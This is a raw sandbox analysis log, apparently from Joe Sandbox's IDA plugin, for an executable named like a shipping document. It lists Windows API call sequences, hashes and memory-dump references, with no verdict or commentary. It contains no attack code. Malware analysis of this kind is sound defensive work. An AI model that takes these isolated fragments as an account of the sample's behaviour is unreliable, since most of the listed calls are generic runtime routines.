                    • Opcode ID: b72847dbcf863d2404bfb6156d933097594a3c89b0035137024e9beb8f824c0f
                    • Instruction ID: f4ebc6d5a5442b3d86bd0b1ea24d329f0d50457ca9ed1075084ff80ba8c348f6
                    • Opcode Fuzzy Hash: b72847dbcf863d2404bfb6156d933097594a3c89b0035137024e9beb8f824c0f
                    • Instruction Fuzzy Hash: 7C41813590410AFFCF159F64C848AE9BBB4FB05324F20536AF928B22D1C734A994EB91
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E5673D
                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00E56789
                    • TranslateMessage.USER32(?), ref: 00E567B2
                    • DispatchMessageW.USER32(?), ref: 00E567BC
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E567CB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                    • String ID:
                    • API String ID: 2108273632-0
                    • Opcode ID: 96ca6ba4e5ddf6c7e69dc93a769ca5164f593f4da05155f745e06e8d503313f5
                    • Instruction ID: 7a56ee107ac83897680ba0f65215dea600ab2b54dddd915d701215412b4c6acd
                    • Opcode Fuzzy Hash: 96ca6ba4e5ddf6c7e69dc93a769ca5164f593f4da05155f745e06e8d503313f5
                    • Instruction Fuzzy Hash: F931B4329006069FDB248BB1CC44FF67BF8AB09309F541976E825F71A1E725A88ED790
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00E58CF2
                    • PostMessageW.USER32(?,00000201,00000001), ref: 00E58D9C
                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E58DA4
                    • PostMessageW.USER32(?,00000202,00000000), ref: 00E58DB2
                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E58DBA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessagePostSleep$RectWindow
                    • String ID:
                    • API String ID: 3382505437-0
                    • Opcode ID: bdb267b810a36f7746ca8b5d7ca3e11513fd2f7e015ed6a20097ad4fba71da03
                    • Instruction ID: a0573199b4f6bd6ce50e44c7387769e63773f1900cd1e34cec851550d3c1dad4
                    • Opcode Fuzzy Hash: bdb267b810a36f7746ca8b5d7ca3e11513fd2f7e015ed6a20097ad4fba71da03
                    • Instruction Fuzzy Hash: FE31CE71900219EFDF14CF68DA4CAAE3BB9EB14316F104629FD29FA1D0C7B09918DB91
                    APIs
                    • IsWindowVisible.USER32(?), ref: 00E5B4C6
                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E5B4E3
                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E5B51B
                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E5B541
                    • _wcsstr.LIBCMT ref: 00E5B54B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                    • String ID:
                    • API String ID: 3902887630-0
                    • Opcode ID: dbdce022ffaeecf14d174088a1fb3945741ab561db8aa9b9e5b876a8a4d0e786
                    • Instruction ID: aa4387b002bc1960934351d7df1956f562f00fdd6456b363c8cee215f8f0f015
                    • Opcode Fuzzy Hash: dbdce022ffaeecf14d174088a1fb3945741ab561db8aa9b9e5b876a8a4d0e786
                    • Instruction Fuzzy Hash: DB210A31604100BEEB255B39AC05E7B7B99DF49751F105139FC09FA1A1FB61CC4497A0
                    APIs
                      • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                    • GetWindowLongW.USER32(?,000000F0), ref: 00E8B1C6
                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00E8B1EB
                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E8B203
                    • GetSystemMetrics.USER32(00000004), ref: 00E8B22C
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E70FA5,00000000), ref: 00E8B24A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$Long$MetricsSystem
                    • String ID:
                    • API String ID: 2294984445-0
                    • Opcode ID: 6515aa4b52c82ce9b4a01e04d90f663e34346dd2155a27e6b801b6942adec6d0
                    • Instruction ID: ff03bb0c560fa68340587dcccc6c58cf408e7982d5fc06dcfc1c7f650a4be4b3
                    • Opcode Fuzzy Hash: 6515aa4b52c82ce9b4a01e04d90f663e34346dd2155a27e6b801b6942adec6d0
                    • Instruction Fuzzy Hash: E6217C32910655AFCB14AF798C08A6A37A4EB05725F105738F93EF62F0E730A8559B90
                    APIs
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E595E2
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E59614
                    • __itow.LIBCMT ref: 00E5962C
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E59654
                    • __itow.LIBCMT ref: 00E59665
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$__itow$_memmove
                    • String ID:
                    • API String ID: 2983881199-0
                    • Opcode ID: 503368bac5f7815e5d3cc74635229208b1143c86703d4f0c18e267701de2c88c
                    • Instruction ID: 36e043f6969e02eed8b211c7fd8eccd026c6b4e52f8db16e7c7efaaaf2f39433
                    • Opcode Fuzzy Hash: 503368bac5f7815e5d3cc74635229208b1143c86703d4f0c18e267701de2c88c
                    • Instruction Fuzzy Hash: EA21C831B00214FBDB10AAA58C89EEE7BE8DB59715F042425FD04F7292D6B09D8D9792
                    APIs
                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E0134D
                    • SelectObject.GDI32(?,00000000), ref: 00E0135C
                    • BeginPath.GDI32(?), ref: 00E01373
                    • SelectObject.GDI32(?,00000000), ref: 00E0139C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: d0abdcf5ce62585502134d0328c2978b40b9f56737a1cffe18eea5514f72dc5b
                    • Instruction ID: 709200f88d8a2a1ad9145e43941455a64033527b9ae35da16d4be869cdeda1d8
                    • Opcode Fuzzy Hash: d0abdcf5ce62585502134d0328c2978b40b9f56737a1cffe18eea5514f72dc5b
                    • Instruction Fuzzy Hash: 16214F32800604DFDB159F16EC09B6D7BA8EB00355F54427AF414BA1E0D776A8DADF50
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00E64B61
                    • __beginthreadex.LIBCMT ref: 00E64B7F
                    • MessageBoxW.USER32(?,?,?,?), ref: 00E64B94
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E64BAA
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E64BB1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                    • String ID:
                    • API String ID: 3824534824-0
                    • Opcode ID: 35117d51f8b8986b2cdc28f7f2e45f712f6f7f1ab995deb976c73672d3fe6bf9
                    • Instruction ID: a2a5c198bb70555cd9b561c3128bed1c9b71cec0ff143a37c92d908843ab2655
                    • Opcode Fuzzy Hash: 35117d51f8b8986b2cdc28f7f2e45f712f6f7f1ab995deb976c73672d3fe6bf9
                    • Instruction Fuzzy Hash: C31125B2905204AFC7019BA9EC08E9A7FECEB44324F140265F814F32A1D6B2C84887A0
                    APIs
                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E58546
                    • GetLastError.KERNEL32(?,00E5800A,?,?,?), ref: 00E58550
                    • GetProcessHeap.KERNEL32(00000008,?,?,00E5800A,?,?,?), ref: 00E5855F
                    • HeapAlloc.KERNEL32(00000000,?,00E5800A,?,?,?), ref: 00E58566
                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E5857D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 842720411-0
                    • Opcode ID: 28bfbf8c5ee9f959bbd5d3c950983d20b2d33eca0b5ffbb6449c0720146deeb7
                    • Instruction ID: d3e3c449e38f83b39779cda0652d9ea0a53bc0c8113b5135ec04b9b606755c0a
                    • Opcode Fuzzy Hash: 28bfbf8c5ee9f959bbd5d3c950983d20b2d33eca0b5ffbb6449c0720146deeb7
                    • Instruction Fuzzy Hash: B7014F71601204EFDB114FA6ED48D6B7B6CFF457557140529F809E2120EA318D14DF60
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E65307
                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E65315
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E6531D
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E65327
                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E65363
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: PerformanceQuery$CounterSleep$Frequency
                    • String ID:
                    • API String ID: 2833360925-0
                    • Opcode ID: ca2958441eff8578f2d69eba2155b659d580c18c97d014b256d66270e581e183
                    • Instruction ID: fe666ae3d5557636137468949b83fe70fcdeaf32aa55dcc174c0c677e0f9d0ae
                    • Opcode Fuzzy Hash: ca2958441eff8578f2d69eba2155b659d580c18c97d014b256d66270e581e183
                    • Instruction Fuzzy Hash: C601AD32D82A1DDBCF009FE5EC8C5EDBB78FB08780F01045AE845F2254CB70551487A1
                    APIs
                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E5736C,80070057,?,?,?,00E5777D), ref: 00E5744F
                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E5736C,80070057,?,?), ref: 00E5746A
                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E5736C,80070057,?,?), ref: 00E57478
                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E5736C,80070057,?), ref: 00E57488
                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E5736C,80070057,?,?), ref: 00E57494
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: From$Prog$FreeStringTasklstrcmpi
                    • String ID:
                    • API String ID: 3897988419-0
                    • Opcode ID: c4d5a342b48e72f4e3e39c344adfcaf188ea0bf0a13e99c5bf228ce628d45aa3
                    • Instruction ID: 3cbd6c5a21fac771aa5e7e576703547058fd11c7a943c5b2afa918a36a453c38
                    • Opcode Fuzzy Hash: c4d5a342b48e72f4e3e39c344adfcaf188ea0bf0a13e99c5bf228ce628d45aa3
                    • Instruction Fuzzy Hash: A0018F72601218BFDB245F65EC44BAA7FBDEB44762F145424FD48E2220EB31DD589BA0
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E583E8
                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E583F2
                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E58401
                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E58408
                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E5841E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: f70cde26ba4d04e17bce5e089fd5856116e36d85f7f1c6abb5f1d94dc5eabf1c
                    • Instruction ID: 7c243ac967b44f06d551dc37f0e91f57a01af0b4239d211aae6f8abe3cce5c58
                    • Opcode Fuzzy Hash: f70cde26ba4d04e17bce5e089fd5856116e36d85f7f1c6abb5f1d94dc5eabf1c
                    • Instruction Fuzzy Hash: C4F04F31205305AFEB105FA6DC8DE6B3BACEF89759F100425FD4AE6150DA61DC49EB60
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E58449
                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E58453
                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58462
                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58469
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E5847F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: d18807c80b875cabef408977b73f16265055043b32e5cfbb7fc3995551877c17
                    • Instruction ID: 13f128066bde410a3ac7d58f1ee211e3dbfcf891aecdc2fc640dcaed73eef4d8
                    • Opcode Fuzzy Hash: d18807c80b875cabef408977b73f16265055043b32e5cfbb7fc3995551877c17
                    • Instruction Fuzzy Hash: 33F0A930201305AFEB211FA6EC88E6B3BACEF89759B140429FD09E3150DA60D808EB60
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00E5C4B9
                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E5C4D0
                    • MessageBeep.USER32(00000000), ref: 00E5C4E8
                    • KillTimer.USER32(?,0000040A), ref: 00E5C504
                    • EndDialog.USER32(?,00000001), ref: 00E5C51E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                    • String ID:
                    • API String ID: 3741023627-0
                    • Opcode ID: c85930352d656497ef3393dbd2c5cc13d72f20689ce86aa775d1a81b5585a8f9
                    • Instruction ID: 278cf45e8f8ca7f9d7dcf6be06a4000af8d232b404aa8f456338025cf81eec36
                    • Opcode Fuzzy Hash: c85930352d656497ef3393dbd2c5cc13d72f20689ce86aa775d1a81b5585a8f9
                    • Instruction Fuzzy Hash: CF01A230400304AFEB215B61DC5EFA677B8FF0470AF100669E986B10E0EBE0A98C8B80
                    APIs
                    • EndPath.GDI32(?), ref: 00E013BF
                    • StrokeAndFillPath.GDI32(?,?,00E3BA08,00000000,?), ref: 00E013DB
                    • SelectObject.GDI32(?,00000000), ref: 00E013EE
                    • DeleteObject.GDI32 ref: 00E01401
                    • StrokePath.GDI32(?), ref: 00E0141C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
                    • Opcode ID: e0af359788ba7016d89806fb691569d9d8b411627e6e3446b13e750e624a2fbb
                    • Instruction ID: b8b0feaad721f917429dfd6e92a44a73260bcc9218df46d21fbce9587d7e1b84
                    • Opcode Fuzzy Hash: e0af359788ba7016d89806fb691569d9d8b411627e6e3446b13e750e624a2fbb
                    • Instruction Fuzzy Hash: 88F0C932004A08EFDB195F27ED4CB583BA5A71132AF189275E429A90F1CB3659DADF50
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 00E6C4BE
                    • CoCreateInstance.OLE32(00E92D6C,00000000,00000001,00E92BDC,?), ref: 00E6C4D6
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                    • CoUninitialize.OLE32 ref: 00E6C743
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CreateInitializeInstanceUninitialize_memmove
                    • String ID: .lnk
                    • API String ID: 2683427295-24824748
                    • Opcode ID: 4d0feabbc37fcc375016b5fd68f8fd0b1c7f88440a9c2f7d1c42801ca696c013
                    • Instruction ID: 21c46f02d3da2e7ae8f41c8d6daf67a8ceb001fdda2a43505bb5e9d000859ca8
                    • Opcode Fuzzy Hash: 4d0feabbc37fcc375016b5fd68f8fd0b1c7f88440a9c2f7d1c42801ca696c013
                    • Instruction Fuzzy Hash: 20A12B71208205AFD704EF64C891EABB7F8EF98304F00595DF596A71D2DB70EA89CB52
                    APIs
                      • Part of subcall function 00E20F36: std::exception::exception.LIBCMT ref: 00E20F6C
                      • Part of subcall function 00E20F36: __CxxThrowException@8.LIBCMT ref: 00E20F81
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                      • Part of subcall function 00E07BB1: _memmove.LIBCMT ref: 00E07C0B
                    • __swprintf.LIBCMT ref: 00E1302D
                    Strings
                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E12EC6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                    • API String ID: 1943609520-557222456
                    • Opcode ID: 2a612c9ea74d030e0da86309cc6451a5819c10a21f13bf481f3dc9b2790b2cc5
                    • Instruction ID: 474b4c82e2e159801700366e676d1fd79d648e24fd7cfec0d51c95aa97c7af8e
                    • Opcode Fuzzy Hash: 2a612c9ea74d030e0da86309cc6451a5819c10a21f13bf481f3dc9b2790b2cc5
                    • Instruction Fuzzy Hash: 46915E716083019FCB18EF24D895CAFB7E4EF99700F04691DF495A72A2DA30EE85CB52
                    APIs
